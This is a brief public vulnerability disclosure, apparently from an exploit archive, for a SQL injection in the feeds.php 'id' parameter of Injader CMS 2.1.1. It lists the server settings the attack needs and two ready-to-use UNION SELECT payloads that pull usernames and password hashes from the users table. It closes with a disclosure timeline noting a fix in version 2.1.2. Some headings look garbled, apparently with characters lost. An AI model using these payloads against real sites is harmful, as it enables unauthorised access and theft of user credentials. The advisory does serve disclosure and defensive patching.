Injader CMS 2.1.1 SQL Injection

`Injader CMS  
http://www.injader.com/  
  
  
  
- (= 2.1.1 -  
  
- SQL -  
http://localhost/upload/feeds.php?name=articles&id=<SQL>  
magic_quotes_gpc = Off  
register_globals = On  
  
  
Username (urlencode):  
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511  
Pass:  
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758  
  
  
  
- Timeline -  
Author notified: Nov 30, Dec 09,10  
Injader 2.1.2: Dec 12  
Public disclosure: Dec 18  
  
  
- Seasons Greetings -  
- http://nukeit.org -  
  
  
`